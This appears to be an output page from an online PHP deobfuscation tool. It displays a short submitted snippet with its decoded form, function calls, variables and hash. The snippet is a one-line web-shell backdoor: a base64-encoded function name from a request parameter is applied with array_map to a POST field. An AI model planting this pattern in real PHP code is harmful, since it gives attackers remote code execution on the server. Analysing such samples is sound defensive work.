Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $arr = array($_POST['pass'],); array_map(base64_decode($e), ..

Decoded Output download

<?php
	$e = $_REQUEST['e'];
	$arr = array($_POST['pass'],);
	array_map(base64_decode($e), $arr);
?>

Did this file decode correctly?

Original Code

<?php
	$e = $_REQUEST['e'];
	$arr = array($_POST['pass'],);
	array_map(base64_decode($e), $arr);
?>

Function Calls

base64_decode 1

Variables

$e None
$arr [{'key': 0, 'value': None}]

Stats

MD5 5d638882f46f668e94b46e801d6c8716
Eval Count 0
Decode Time 109 ms